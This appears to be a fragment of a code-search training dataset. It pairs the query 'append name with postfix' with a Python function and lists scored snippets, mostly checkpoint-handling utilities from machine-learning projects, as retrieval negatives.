fetch_checkpoints_till_final(checkpoint_dir):\n\n MIN_SLEEP_INTERVAL = 1.0 # in seconds\n MAX_SLEEP_INTERVAL = 60.0 # in seconds\n sleep_interval = MIN_SLEEP_INTERVAL\n\n finished_checkpoints = set()\n\n def _add_and_log(path):\n finished_checkpoints.add(path)\n logger.info(\"Found checkpoint: {}\".format(path))\n return path\n\n def _log_and_sleep(sleep_interval):\n logger.info(\n \"Sleep {} seconds while waiting for model_final.pth\".format(sleep_interval)\n )\n time.sleep(sleep_interval)\n return min(sleep_interval * 2, MAX_SLEEP_INTERVAL)\n\n def _get_lightning_checkpoints(path: str):\n return [\n os.path.join(path, x)\n for x in PathManager.ls(path)\n if x.endswith(ModelCheckpoint.FILE_EXTENSION)\n and not x.startswith(ModelCheckpoint.CHECKPOINT_NAME_LAST)\n ]\n\n while True:\n if not PathManager.exists(checkpoint_dir):\n sleep_interval = _log_and_sleep(sleep_interval)\n continue\n\n checkpoint_paths = DetectionCheckpointer(\n None, save_dir=checkpoint_dir\n ).get_all_checkpoint_files()\n checkpoint_paths.extend(_get_lightning_checkpoints(checkpoint_dir))\n\n final_model_path = None\n periodic_checkpoints = []\n\n for path in sorted(checkpoint_paths):\n if path.endswith(\"model_final.pth\") or path.endswith(\"model_final.ckpt\"):\n final_model_path = path\n continue\n\n if path.endswith(ModelCheckpoint.FILE_EXTENSION):\n # Lightning checkpoint\n model_iter = int(\n re.findall(\n r\"(?<=step=)\\d+(?={})\".format(ModelCheckpoint.FILE_EXTENSION),\n path,\n )[0]\n )\n else:\n model_iter = int(re.findall(r\"(?<=model_)\\d+(?=\\.pth)\", path)[0])\n periodic_checkpoints.append((path, model_iter))\n\n periodic_checkpoints = [\n pc for pc in periodic_checkpoints if pc[0] not in finished_checkpoints\n ]\n periodic_checkpoints = sorted(periodic_checkpoints, key=lambda x: x[1])\n for pc in periodic_checkpoints:\n yield _add_and_log(pc[0])\n sleep_interval = MIN_SLEEP_INTERVAL\n\n if final_model_path is None:\n sleep_interval = _log_and_sleep(sleep_interval)\n else:\n yield _add_and_log(final_model_path)\n break", "def make_checkpoint(self, f_id, files):\n logging.info(\"Saving a checkpoint of the current model...\")\n\n # NOTE: model may be an instance of apex.parallel.distributed.DistributedDataParallel\n # in this case, model.module is the actual pytorch module\n model_to_save = \\\n self.model.module \\\n if hasattr(self.model, 'module') \\\n else self.model\n\n # Save model weights, optimizer state, AMP master parameters and\n # the list of .hdf5 that are yet to be used (e.g. for resuming pre-training)\n if self.resume_step < 0 or not self.phase2:\n output_save_file = os.path.join(\n self.output_directory,\n f\"ckpt_{self.global_step}.pt\")\n else:\n output_save_file = os.path.join(\n self.output_directory,\n f\"ckpt_{self.global_step + self.phase1_end_step}.pt\")\n torch.save(\n {\n 'model': model_to_save.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'master params': list(amp.master_params(self.optimizer)),\n 'files': [f_id] + files\n },\n output_save_file\n )\n\n # Keep only a specific number of 'best' checkpoints\n self.most_recent_ckpts_paths.append(output_save_file)\n if len(self.most_recent_ckpts_paths) > self.num_checkpoints_to_keep:\n checkpoint_to_remove = \\\n self.most_recent_ckpts_paths.pop(0)\n os.remove(checkpoint_to_remove)", "def _generate_validation_fold(self):\n\n for offset in range(self.nb_folds):\n # Load all the data from cache (do this to save memory)\n with open(self.data_cache_path_str + \"data_cache.pkl\", \"rb\") as f:\n data_df, target_df = pickle.load(f)\n\n # Generate train and test sets\n data_dates_lst = data_df[\"date\"].drop_duplicates().sort_values().tolist()\n train_start_day = len(data_dates_lst) - ((self.nb_folds - offset) * self.test_nb_days + self.train_nb_days)\n train_end_day = train_start_day + self.train_nb_days\n test_start_day = train_end_day\n test_end_day = test_start_day + self.test_nb_days\n\n train_dates_lst = data_dates_lst[train_start_day:train_end_day]\n test_dates_lst = data_dates_lst[test_start_day:test_end_day]\n\n # Generate train and test labels\n training_set_df = data_df.loc[data_df[\"date\"].isin(train_dates_lst)].reset_index(drop = True)\n testing_set_df = data_df.loc[data_df[\"date\"].isin(test_dates_lst)].reset_index(drop = True)\n new_target_df = target_df.loc[data_df[\"date\"].isin(train_dates_lst)].reset_index(drop = True)\n truth_df = target_df.loc[data_df[\"date\"].isin(test_dates_lst)].reset_index(drop = True)\n\n # Reduce memory usage\n del data_df, target_df\n gc.collect()\n\n # Return result\n yield (training_set_df, testing_set_df, new_target_df, truth_df)", "def checkpoint_period_get(self):\n raise Exception(\"TODO\")", "def backtrack(self):\n prediction = list()\n\n # import ipdb\n # ipdb.set_trace()\n # Initialize for length of top-k sequences\n length = [[self.max_unroll] * self.beam_size for _ in range(self.batch_size)]\n\n # Last step output of the beam are not sorted => sort here!\n # Size not changed [batch size, beam_size]\n top_k_score, top_k_idx = self.scores[-1].topk(self.beam_size, dim=1)\n\n # Initialize sequence scores\n top_k_score = top_k_score.clone()\n\n n_eos_in_batch = [0] * self.batch_size\n\n # Initialize Back-pointer from the last step\n # Add self.position_idx for indexing variable with batch x beam as the first dimension\n # [batch x beam]\n back_pointer = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)\n\n for t in reversed(range(self.max_unroll)):\n # Reorder variables with the Back-pointer\n # [batch x beam]\n token_id = self.token_ids[t].index_select(0, back_pointer)\n\n # Reorder the Back-pointer\n # [batch x beam]\n back_pointer = self.back_pointers[t].index_select(0, back_pointer)\n\n # Indices of ended sequences\n # [< batch x beam]\n eos_indices = self.token_ids[t].data.eq(EOS_ID).nonzero()\n\n # For each batch, every time we see an EOS in the backtracking process,\n # If not all sequences are ended\n # lowest scored survived sequence <- detected ended sequence\n # if all sequences are ended\n # lowest scored ended sequence <- detected ended sequence\n if eos_indices.dim() > 0:\n # Loop over all EOS at current step\n for i in range(eos_indices.size(0) - 1, -1, -1):\n # absolute index of detected ended sequence\n eos_idx = eos_indices[i, 0].item()\n\n # At which batch EOS is located\n batch_idx = eos_idx // self.beam_size\n batch_start_idx = batch_idx * self.beam_size\n\n # if n_eos_in_batch[batch_idx] > self.beam_size:\n\n # Index of sequence with lowest score\n _n_eos_in_batch = n_eos_in_batch[batch_idx] % self.beam_size\n beam_idx_to_be_replaced = self.beam_size - _n_eos_in_batch - 1\n idx_to_be_replaced = batch_start_idx + beam_idx_to_be_replaced\n\n # Replace old information with new sequence information\n back_pointer[idx_to_be_replaced] = self.back_pointers[t][eos_idx].item()\n token_id[idx_to_be_replaced] = self.token_ids[t][eos_idx].item()\n top_k_score[batch_idx,\n beam_idx_to_be_replaced] = self.scores[t].view(-1)[eos_idx].item()\n length[batch_idx][beam_idx_to_be_replaced] = t + 1\n\n n_eos_in_batch[batch_idx] += 1\n\n # max_unroll * [batch x beam]\n prediction.append(token_id)\n\n # Sort and re-order again as the added ended sequences may change the order\n # [batch, beam]\n top_k_score, top_k_idx = top_k_score.topk(self.beam_size, dim=1)\n final_score = top_k_score.data\n\n for batch_idx in range(self.batch_size):\n length[batch_idx] = [length[batch_idx][beam_idx.item()]\n for beam_idx in top_k_idx[batch_idx]]\n\n # [batch x beam]\n top_k_idx = (top_k_idx + self.batch_position.unsqueeze(1)).view(-1)\n\n # Reverse the sequences and re-order at the same time\n # It is reversed because the backtracking happens in the reverse order\n # [batch, beam]\n\n prediction = [step.index_select(0, top_k_idx).view(\n self.batch_size, self.beam_size) for step in reversed(prediction)]\n\n # [batch, beam, max_unroll]\n prediction = torch.stack(prediction, 2)\n\n return prediction, final_score, length", "def train_step(self) -> Tuple[Dict[str, Any], Dict[str, Any], bool]:\n assert self.episode_per_test is not None\n assert self.train_collector is not None\n stop_fn_flag = False\n if self.train_fn:\n self.train_fn(self.epoch, self.env_step)\n result = self.train_collector.collect(\n n_step=self.step_per_collect, n_episode=self.episode_per_collect\n )\n if result[\"n/ep\"] > 0 and self.reward_metric:\n rew = self.reward_metric(result[\"rews\"])\n result.update(rews=rew, rew=rew.mean(), rew_std=rew.std())\n self.env_step += int(result[\"n/st\"])\n self.logger.log_train_data(result, self.env_step)\n self.last_rew = result[\"rew\"] if result[\"n/ep\"] > 0 else self.last_rew\n self.last_len = result[\"len\"] if result[\"n/ep\"] > 0 else self.last_len\n data = {\n \"env_step\": str(self.env_step),\n \"rew\": f\"{self.last_rew:.2f}\",\n \"len\": str(int(self.last_len)),\n \"n/ep\": str(int(result[\"n/ep\"])),\n \"n/st\": str(int(result[\"n/st\"])),\n }\n if result[\"n/ep\"] > 0:\n if self.test_in_train and self.stop_fn and self.stop_fn(result[\"rew\"]):\n assert self.test_collector is not None\n test_result = test_episode(\n self.policy, self.test_collector, self.test_fn, self.epoch,\n self.episode_per_test, self.logger, self.env_step\n )\n if self.stop_fn(test_result[\"rew\"]):\n stop_fn_flag = True\n self.best_reward = test_result[\"rew\"]\n self.best_reward_std = test_result[\"rew_std\"]\n else:\n self.policy.train()\n\n return data, result, stop_fn_flag", "def restore_state(model, optimizer, latest_snapshot):\n\n checkpoint = torch.load(latest_snapshot,\n map_location=lambda storage, loc: storage.cuda(args[\"local_rank\"]))\n\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n return checkpoint['seen_images'], checkpoint['epochs']", "def snapshot_state(self) -> Mapping[str, jnp.ndarray]:\n snapshot_state = {}\n if not self.CHECKPOINT_ATTRS and not self.NON_BROADCAST_CHECKPOINT_ATTRS:\n logging.warning(\n \"Your experiment's self.CHECKPOINT_ATTRS and \"\n \"self.NON_BROADCAST_CHECKPOINT_ATTRS are empty. Your job will not \"\n \"checkpoint any state or parameters. See \"\n \"learning/deepmind/research/jax/pipeline/examples/imagenet/\"\n \"experiment.py for an example of specifying values to checkpoint.\")\n for attr_name, chk_name in self.CHECKPOINT_ATTRS.items():\n snapshot_state[chk_name] = utils.get_first(getattr(self, attr_name))\n for attr_name, chk_name in self.NON_BROADCAST_CHECKPOINT_ATTRS.items():\n snapshot_state[chk_name] = getattr(self, attr_name)\n return snapshot_state", "def _get_latest_checkpoint_number(cls, checkpoints_dir):\n nums = cls._checkpoint_numbers(checkpoints_dir)\n if len(nums) == 0:\n return None\n else:\n return max(nums)", "def last_checkpoint(prefixes, snapshot_interval=None, max_iter=None,\n snapshot_ext=\".solverstate\", weights_ext=\".caffemodel\"):\n if not isinstance(prefixes, list):\n prefixes = [prefixes]\n if not snapshot_interval:\n snapshot_interval = 1\n model_iter_pattern = None\n solver_iter_pattern = None\n if snapshot_ext:\n solver_iter_pattern = re.compile(r'iter_(?P<ITER>\\d+){}$'.format(re.escape(snapshot_ext)))\n if weights_ext:\n model_iter_pattern = re.compile(r'iter_(?P<ITER>\\d+){}$'.format(re.escape(weights_ext)))\n snapshot = ''\n iterations = -1\n model_iterations = 0\n weights = ''\n found_solver = False\n found_model = False\n for prefix in prefixes:\n path = op.dirname(prefix)\n base = op.basename(prefix)\n if not op.isdir(path):\n if path:\n logging.info('last_checkpoint ignored invalid path: \"{}\"'.format(path))\n continue\n\n if iterations >= 0:\n found_solver = True\n if model_iterations:\n found_model = True\n if found_solver and found_model:\n break\n solver = model = None\n for fname in os.listdir(path):\n if not fname.startswith(base):\n continue\n if solver_iter_pattern:\n solver = re.search(solver_iter_pattern, fname) if not found_solver else None\n if model_iter_pattern:\n model = re.search(model_iter_pattern, fname) if not found_model else None\n if solver:\n iters = int(solver.group('ITER'))\n if iters == max_iter:\n found_solver = True\n if not found_solver and (iters % snapshot_interval != 0 or iters > max_iter):\n logging.info('Ignore snapshot interval: {} snapshot: {} max_iter: {}'.format(\n snapshot_interval, fname, max_iter))\n elif iters > iterations or found_solver:\n snapshot = op.join(path, fname)\n iterations = iters\n if model:\n iters = int(model.group('ITER'))\n if iters == max_iter:\n found_model = True\n if not found_model and (iters % snapshot_interval != 0 or iters > max_iter):\n logging.info('Ignore snapshot interval: {} snapshot: {} max_iter: {}'.format(\n snapshot_interval, fname, max_iter))\n elif iters > model_iterations or found_model:\n weights = op.join(path, fname)\n model_iterations = iters\n\n if iterations < 0:\n iterations = 0\n return snapshot, iterations, weights", "def restore_checkpoint(self, subtree_root: 'Node') -> str:\n envscore, done = 0, False\n env, obs, infos = self.reset()\n cmd_history = subtree_root.cmd_history()\n if len(cmd_history) > 0:\n for index, cmd in cmd_history:\n obs, envscore, done, infos = self.step(index, cmd)\n self.current.extra_info = subtree_root.extra_info.copy()\n return obs, envscore, done, infos", "def load_checkpoint(cfg, args):\n checkpoint_iteration = args.checkpoint\n bucket = connect_to_bucket(args.bucket)\n # load actual checkpoint\n if not os.path.isdir(cfg.OUTPUT_DIR):\n os.mkdir(cfg.OUTPUT_DIR)\n blob = bucket.blob(cfg.OUTPUT_DIR + \"/model_\" + str(checkpoint_iteration) + \".pth\")\n blob.download_to_filename(cfg.OUTPUT_DIR + \"/model_\" + str(checkpoint_iteration) + \".pth\")\n if args.resume:\n # also write last checkpoint file for when --resume statement, model gets checkpoint name from this file\n with open(cfg.OUTPUT_DIR + \"/last_checkpoint\", \"w\") as file:\n file.write(\"model_\" + str(checkpoint_iteration) + \".pth\")\n # return statement not clean, but useful for inference code\n return checkpoint_iteration, bucket", "def restore_best_checkpoint(session, ckpt_dir):\n try:\n evals_file = os.path.join(ckpt_dir, EVALUATIONS_FILE)\n f = open(evals_file)\n evals = json.load(f)\n best_ckpt = max(evals, key=lambda e: e['accuracy'])\n\n except Exception as e:\n raise Exception('Error reading evaluations summary file: {}'.format(e))\n\n ckpt_file = \"{}-{}\".format(BEST_MODEL_PREFIX, best_ckpt['iteration'])\n saver = tf.train.Saver()\n saver.restore(session, os.path.join(ckpt_dir, ckpt_file))", "def SelectTestCheckpoint(\n log_dir: Path,\n) -> Tuple[epoch_pb2.Epoch, checkpoint_pb2.Checkpoint]:\n best_f1 = -1\n best_epoch_num = None\n for path in (log_dir / \"epochs\").iterdir():\n if path.name.endswith(\".EpochList.pbtxt\"):\n epoch = pbutil.FromFile(path, epoch_pb2.EpochList())\n f1 = epoch.epoch[0].val_results.mean_f1\n epoch_num = epoch.epoch[0].epoch_num\n if f1 >= best_f1:\n best_f1 = f1\n best_epoch_num = epoch_num\n epoch = pbutil.FromFile(\n log_dir / \"epochs\" / f\"{best_epoch_num:03d}.EpochList.pbtxt\",\n epoch_pb2.EpochList(),\n )\n checkpoint = pbutil.FromFile(\n log_dir / \"checkpoints\" / f\"{best_epoch_num:03d}.Checkpoint.pb\",\n checkpoint_pb2.Checkpoint(),\n )\n logging.info(\n \"Selected best checkpoint %d with val F1 score %.3f\",\n epoch.epoch[0].epoch_num,\n epoch.epoch[0].val_results.mean_f1,\n )\n return epoch.epoch[0], checkpoint", "def _checkpoint_numbers(cls, checkpoints_dir):\n dirs = [d for d in listdir(checkpoints_dir) if d.endswith('.checkpoint')]\n return sorted([int(d[:-11]) for d in dirs])", "def evaluate_and_export(self):\n latest_ckpt_path = self._estimator.latest_checkpoint()\n if not latest_ckpt_path:\n self._log_err_msg('Estimator is not trained yet. Will start an '\n 'evaluation when a checkpoint is ready.')\n return None\n\n if latest_ckpt_path == self._previous_ckpt_path:\n self._log_err_msg(\n 'No new checkpoint ready for evaluation. Skip the current '\n 'evaluation pass as evaluation results are expected to be same '\n 'for the same checkpoint.')\n return None\n eval_result = self._estimator.evaluate(\n input_fn=self._eval_spec.input_fn,\n steps=self._eval_spec.steps,\n name=self._eval_spec.name,\n checkpoint_path=latest_ckpt_path,\n hooks=self._eval_spec.hooks)\n\n if not eval_result:\n raise RuntimeError(\n 'Internal error: `Estimator.evaluate` should never return empty '\n 'result.')\n if not isinstance(eval_result, dict):\n raise TypeError(\n '`Estimator.evaluate` should return dict. Given {}.'.format(\n type(eval_result)))\n if ops.GraphKeys.GLOBAL_STEP not in eval_result:\n raise RuntimeError(\n 'Internal error: `Estimator.evaluate` result should have '\n '`global_step` in result. Given {}'.format(eval_result))\n\n self._export_eval_result(eval_result, latest_ckpt_path)\n\n self._last_warning_time = 0\n self._previous_ckpt_path = latest_ckpt_path\n return eval_result", "def load_states(self, checkpoint):\n raise NotImplementedError()", "def save_checkpoint(self) -> Dict[str, Union[Dict[str, torch.Tensor], dict]]:\n if isinstance(self.model, nn.DataParallel) or isinstance(self.model, nn.parallel.DistributedDataParallel):\n model = self.model.module.state_dict()\n else:\n model = self.model.state_dict()\n\n checkpoint = {\n \"model_state_dict\": deepcopy(model),\n \"optimizer_state_dict\": deepcopy(self.optimizer.state_dict()),\n }\n return checkpoint", "def on_save_checkpoint(self):\n callback_states = {}\n for callback in self.callbacks:\n callback_class = type(callback)\n state = callback.on_save_checkpoint(self, self.get_model())\n if state:\n callback_states[callback_class] = state\n return callback_states", "def checkCheckpoint(self):\n if self.maze.checkpoints[self.checkpoint].checkCollision(self.pos):\n self.checkpoint +=1\n if(self.checkpoint >= self.maze.checkpointsPerLap):\n if(self.maze.mazeType == \"circular\"):\n self.checkpoint = 0\n self.laps +=1\n elif(self.maze.mazeType == \"linear\"):\n self.checkpoint = 0\n self.laps +=1\n self.resetPos()\n self.targetCheckpointPos = self.maze.checkpoints[self.checkpoint].getMidInt()", "def get_callbacks(args):\n\n # Model checkpoint\n model_checkpoint_clbk = pl.callbacks.model_checkpoint.ModelCheckpoint(\n dirpath=None,\n filename='best',\n monitor=args.metric_monitor,\n save_last=True,\n mode='max',\n )\n model_checkpoint_clbk.CHECKPOINT_NAME_LAST = '{epoch}-{step}'\n callbacks = [\n model_checkpoint_clbk,\n DecayLR(lr_init=args.lr),\n ]\n return callbacks", "def get_checkpoint_list(dirname):\n all_ckpts = [\n int(_fn.strip('weights_epoch.pt'))\n for _fn in os.listdir(dirname) if _fn.endswith('.pt')\n ]\n return all_ckpts", "def get_checkpoint_list_by_student_id(cls, student_id):\n return cls.create_checkpoint_list_by_student_id(student_id)", "def reload_checkpoint(self):\n checkpoint_path = os.path.join(self.params.dump_path, 'checkpoint.pth')\n if not os.path.isfile(checkpoint_path):\n if self.params.reload_checkpoint == '':\n return\n else:\n checkpoint_path = self.params.reload_checkpoint\n assert os.path.isfile(checkpoint_path)\n logger.warning(\"Reloading checkpoint from %s ...\" % checkpoint_path)\n data = torch.load(checkpoint_path, map_location='cpu')\n\n # reload model parameters\n for name in self.MODEL_NAMES:\n getattr(self, name).load_state_dict(data[name])\n\n # reload optimizers\n for name in self.optimizers.keys():\n if False: # AMP checkpoint reloading is buggy, we cannot do that - TODO: fix - https://github.com/NVIDIA/apex/issues/250\n logger.warning(\"Reloading checkpoint optimizer %s ...\" % name)\n else: # instead, we only reload current iterations / learning rates\n logger.warning(\"Not reloading checkpoint optimizer %s.\" % name)\n for group_id, param_group in enumerate(self.optimizers[name].param_groups):\n if 'num_updates' not in param_group:\n logger.warning(\"No 'num_updates' for optimizer %s.\" % name)\n continue\n logger.warning(\"Reloading 'num_updates' and 'lr' for optimizer %s.\" % name)\n param_group['num_updates'] = data['%s_optimizer' % name]['param_groups'][group_id]['num_updates']\n param_group['lr'] = self.optimizers[name].get_lr_for_step(param_group['num_updates'])\n\n # reload main metrics\n self.epoch = data['epoch'] + 1\n self.n_total_iter = data['n_total_iter']\n self.best_metrics = data['best_metrics']\n self.best_stopping_criterion = data['best_stopping_criterion']\n logger.warning(\"Checkpoint reloaded. Resuming at epoch %i / iteration %i ...\" % (self.epoch, self.n_total_iter))", "def checkpoint(name, first = False):\n global DEBUG\n if DEBUG:\n if name != 'first':\n print 'checkpoint %15s: %f' % ((time.time() - SCRIPT_START) if not first else name, (time.time() - checkpoint.start))\n checkpoint.start = time.time()", "async def get_checkpoint_async(self, partition_id):", "def restore(self, checkpoint):\n raise NotImplementedError", "def restore_checkpoint(model, checkpoint_dir, cuda=False, force=False, pretrain=False):\n try:\n cp_files = [\n file_\n for file_ in os.listdir(checkpoint_dir)\n if file_.startswith(\"epoch=\") and file_.endswith(\".checkpoint.pth.tar\")\n ]\n except FileNotFoundError:\n cp_files = None\n os.makedirs(checkpoint_dir)\n if not cp_files:\n print(\"No saved model parameters found\")\n if force:\n raise Exception(\"Checkpoint not found\")\n else:\n return model, 0, []\n\n # Find latest epoch\n for i in itertools.count(1):\n if \"epoch={}.checkpoint.pth.tar\".format(i) in cp_files:\n epoch = i\n else:\n break\n\n if not force:\n print(\n \"Which epoch to load from? Choose in range [0, {}].\".format(epoch),\n \"Enter 0 to train from scratch.\",\n )\n print(\">> \", end=\"\")\n inp_epoch = int(input())\n if inp_epoch not in range(epoch + 1):\n raise Exception(\"Invalid epoch number\")\n if inp_epoch == 0:\n print(\"Checkpoint not loaded\")\n clear_checkpoint(checkpoint_dir)\n return model, 0, []\n else:\n print(\"Which epoch to load from? Choose in range [1, {}].\".format(epoch))\n inp_epoch = int(input())\n if inp_epoch not in range(1, epoch + 1):\n raise Exception(\"Invalid epoch number\")\n\n filename = os.path.join(\n checkpoint_dir, \"epoch={}.checkpoint.pth.tar\".format(inp_epoch)\n )\n\n print(\"Loading from checkpoint {}?\".format(filename))\n\n if cuda:\n checkpoint = torch.load(filename)\n else:\n # Load GPU model on CPU\n checkpoint = torch.load(filename, map_location=lambda storage, loc: storage)\n\n try:\n start_epoch = checkpoint[\"epoch\"]\n stats = checkpoint[\"stats\"]\n if pretrain:\n model.load_state_dict(checkpoint[\"state_dict\"], strict=False)\n else:\n model.load_state_dict(checkpoint[\"state_dict\"])\n print(\n \"=> Successfully restored checkpoint (trained for {} epochs)\".format(\n checkpoint[\"epoch\"]\n )\n )\n except:\n print(\"=> Checkpoint not successfully restored\")\n raise\n\n return model, inp_epoch, stats", "def resume(self) -> int:\n last_epoch = -1\n latest_file_path = self._fetch_latest_checkpt()\n if latest_file_path and os.path.exists(latest_file_path):\n self.load_params(latest_file_path)\n _, self.checkpt_dir, filename = latest_file_path.rsplit(os.path.sep, 2)\n # fetch the last epoch from the filename\n last_epoch = int(filename.split(\"_\", 1)[0])\n return last_epoch + 1", "def get_history(self):\n if self.validation:\n return self.iterations, (self.losses, self.valid_losses), \\\n (self.weights), (self.misclass_rate, self.valid_misclass_rate)\n return self.iterations, self.losses, self.weights, self.misclass_rate", "def _resume_checkpoint(self, resume_path):\n self.logger.info(\"Loading checkpoint: {} ...\".format(resume_path))\n checkpoint = torch.load(resume_path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.mnt_best = checkpoint['monitor_best']\n\n # load model params from checkpoint.\n if checkpoint['config']['name'] != self.config['name']:\n self.logger.warning(\n 'Warning: Architecture configuration given in config file is different from that of checkpoint. ' + \\\n 'This may yield an exception while state_dict is being loaded.')\n self.model.load_state_dict(checkpoint['model_state_dict'])\n\n # load optimizer state from checkpoint only when optimizer type is not changed. \n if checkpoint['config']['optimizer']['type'] != self.config['optimizer']['type']:\n self.logger.warning('Warning: Optimizer type given in config file is different from that of checkpoint. ' + \\\n 'Optimizer parameters not being resumed.')\n self.optimizer.load_state_dict(checkpoint['model_optimizer'])\n\n # load scheduler state from checkpoint only when scheduler type is not changed\n if checkpoint['config']['scheduler']['type'] != self.config['scheduler']['type']:\n self.logger.warning('Warning: Scheduler type given in config file is different from that of checkpoint. ' + \\\n 'Scheduler parameters not being resumed.')\n self.scheduler.load_state_dict(checkpoint['model_scheduler'])\n\n self.train_logger = checkpoint['logger']\n self.logger.info(\"Checkpoint '{}' (epoch {}) loaded\".format(resume_path, self.start_epoch))" ]
[ "0.744063", "0.70907867", "0.7052293", "0.69212705", "0.68812984", "0.664399", "0.66409785", "0.6579985", "0.6512506", "0.65115094", "0.65036887", "0.63288766", "0.624046", "0.6220209", "0.62004256", "0.61839545", "0.61744016", "0.6170368", "0.6168887", "0.61377853", "0.6108591", "0.61012584", "0.596558", "0.5936436", "0.59361285", "0.59343374", "0.59013444", "0.5896348", "0.58896816", "0.5888293", "0.5848969", "0.57956976", "0.5781577", "0.5769159", "0.57523", "0.5749514", "0.57310784", "0.5726021", "0.5723496", "0.5716103", "0.56912565", "0.5683027", "0.56829864", "0.5655023", "0.564936", "0.56402713", "0.5638397", "0.5638236", "0.5632487", "0.5603866", "0.5600081", "0.5599858", "0.55968153", "0.55892336", "0.55875397", "0.55712086", "0.5568932", "0.556411", "0.5561662", "0.5560189", "0.5558631", "0.5558197", "0.5552293", "0.554177", "0.55391353", "0.5534758", "0.55247605", "0.5518062", "0.55154383", "0.5492035", "0.54775906", "0.54637873", "0.54612595", "0.5460527", "0.54575354", "0.5453942", "0.54407024", "0.54357314", "0.542979", "0.54278344", "0.54218477", "0.5419997", "0.54196596", "0.5415183", "0.54111385", "0.5395826", "0.53910935", "0.538909", "0.5387719", "0.53870726", "0.53851396", "0.53827757", "0.5377471", "0.5373975", "0.53679204", "0.5342753", "0.53400934", "0.5339644", "0.5333741", "0.53321123" ]
0.7678584
0
append name with postfix
def append_name(name, postfix): if name is None: ret = None elif name == '': ret = postfix else: ret = '%s_%s' % (name, postfix) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_name(name):\r\n\r\n\r\n return name + \"-apple\"", "def add_name(self, node):\n if 'name' in self.options:\n name = nodes.fully_normalize_name(self.options.pop('name'))\n if 'name' in node:\n del(node['name'])\n node['names'].append(name)\n self.state.document.note_explicit_target(node, node)", "def add_suffix(name: str, suffix: str):\n return f'{name}_{suffix}'", "def append_to_path(path, name):\n if path[-1] == '/' or path[-1] == ':':\n return path + name\n else:\n return str(path) + str('/') + str(name)", "def create_policy_name(self, role_name, postfix):\n return '{}-{}-{}'.format(role_name, 'policy', postfix)", "def _add_name(self, msg, name):\n try:\n names = self.get_local(msg, \"names\")\n except KeyError:\n names = set()\n names.add(name)\n self.set_local(msg, \"names\", names)", "def addAlias(self, name):\r\n self._otherNames.append(name.strip().lower())", "def __add__(self, new_name: Tuple[str, str]) -> None:\n self.formal_names.update({new_name[0]: new_name[1]})", "def get_name(self, old_name):\n if old_name not in self.record:\n self.record[old_name] = [self.PLACEHOLDER]\n suffix = \"\"\n else:\n self.record[old_name].append(self.PLACEHOLDER)\n suffix = f\"{len(self.record[old_name]) - 1}\"\n\n new_name = f\"{old_name}{suffix}\"\n self.topo_order.append(new_name)\n\n return new_name", "def record_name(self, name: str) -> None:\n if self.is_top_level():\n self._toplevel_names.append(name)", "def add_proper_name (w,lx):\n if ('A' <= w[0] and w[0] <= 'Z'):\n lx.add(w,'P')\n return ''\n else:\n return (w + \" isn't a proper name\")", "def add_proper_name (w,lx):\n if ('A' <= w[0] and w[0] <= 'Z'):\n lx.add(w,'P')\n return ''\n else:\n return (w + \" isn't a proper name\")", "def add_prefix(self, name, uri):\n\n self.prefixes.append('%s: %s' % (name, uri))", "def new_name(self,new_name):\n self.name = new_name", "def _name (self, incAggr = True):\n\t\taggrName = \"@%s\" % self.aggr if self.aggr and incAggr else \"\"\n\t\ttag = \".%s\" % self.tag if self.tag != \"notag\" else \"\"\n\t\treturn \"%s%s%s\" % (self.id, tag, aggrName)", "def updateName(g):\n try:\n n = int(g.group(2))\n except TypeError:\n n = 0\n\n return \"%s-%d\" % (g.group(1), n + 1)", "def add_name(self, name):\n self.name = name", "def namePush(ctxt, value):\n if ctxt is None: ctxt__o = None\n else: ctxt__o = ctxt._o\n ret = libxml2mod.namePush(ctxt__o, value)\n return ret", "def named_back_reference(name:str) -> str:\n # TODO error handling \n return f\"\\\\k<{name}>\"", "def generate_name(self, name):\n return \"{}/{}.{}\".format(self.name, self._layer_counter, name)", "def format_name(self):\n\t\tself.full_name = self.first + \" \" + self.last", "def fullname(self, name):\n f, l = name.split(' ')\n self.first = f\n self.last = l", "def add_nickname(self, nickname):\n if 'Nicknames' not in self.properties:\n self.properties['Nicknames'] = []\n if (len(self.properties['Nicknames']) == 1 and self.properties['Nicknames'][0].startswith('Temp')):\n self.properties['Nicknames'][0] = nickname.title()\n else:\n self.properties['Nicknames'].append(nickname.title())", "def print_name(nome, sobrenome):\r\n return nome + \" \" + sobrenome", "def _generate_node_name(\n self,\n prefix,\n middle,\n suffix,\n ):\n name = ''\n if prefix:\n name += prefix + '-'\n name += middle\n if suffix:\n name += '-' + suffix\n\n return name", "def increment_name(base, existing):\r\n if not base in existing:\r\n return base\r\n n = 1\r\n make_name = lambda: base + str(n)\r\n while make_name() in existing:\r\n n += 1\r\n return make_name()", "def append_service_to_name(self, data, **kwargs):\n\n data['name'] = f'{data.get(\"name\").upper()}_SERVICE'\n return data", "def add_suffix(word, suffix):\n suffix, sep, rest = suffix.partition(' ')\n expanded = _add_suffix(word, suffix)\n return expanded + sep + rest", "def _Name(self, t):\n self.write(t.id)", "def _prefix_name(self, name: str) -> str:\n name_to_check: str = name.split(\".\", 1)[0]\n if self.prefix == \"auto\":\n return f\"-{name}\" if len(name_to_check) <= 1 else f\"--{name}\"\n return f\"{self.prefix}{name}\"", "def add_name(self, name: str) -> None:\n self._names.append(name)", "def updateName( user, login, name, sid, postfix=0 ):\n try:\n print \"Trying to update name with login_name=\", login\n user.first_name = name\n newlogin = login\n #strip the username of any special characters, including spaces\n \n if postfix:\n newlogin=\"%s%03d\" % ( login, postfix )\n user.username = newlogin\n user.save()\n except Exception, e:\n print \"Couldn't update name, rolling back\", e\n transaction.savepoint_rollback(sid)\n updateName( user, login, name, sid, postfix+1 )", "def prefix_id(self, name):\n if \":\" in name: return name\n return self.prefix + \":\" + name", "def addDefName( self, name ):\n nm= self.fullNameFor( name )\n if nm is None: return None\n if nm[-3:] == '...':\n self.logger.debug( \"Abbreviated reference {!r}\".format(name) )\n return None # first occurance is a forward reference using an abbreviation\n if nm not in self.named:\n self.named[nm]= []\n self.logger.debug( \"Adding empty chunk {!r}\".format(name) )\n return nm", "def update_name(self,name=None,plan_id=None):\n self.names[plan_id].append(name)", "def updatePreview(self, baseName, *args):\n\n prefix = str(self.prefix.text())\n suffix = str(self.suffix.text())\n\n string = \"\"\n if len(prefix) > 0:\n string += prefix + 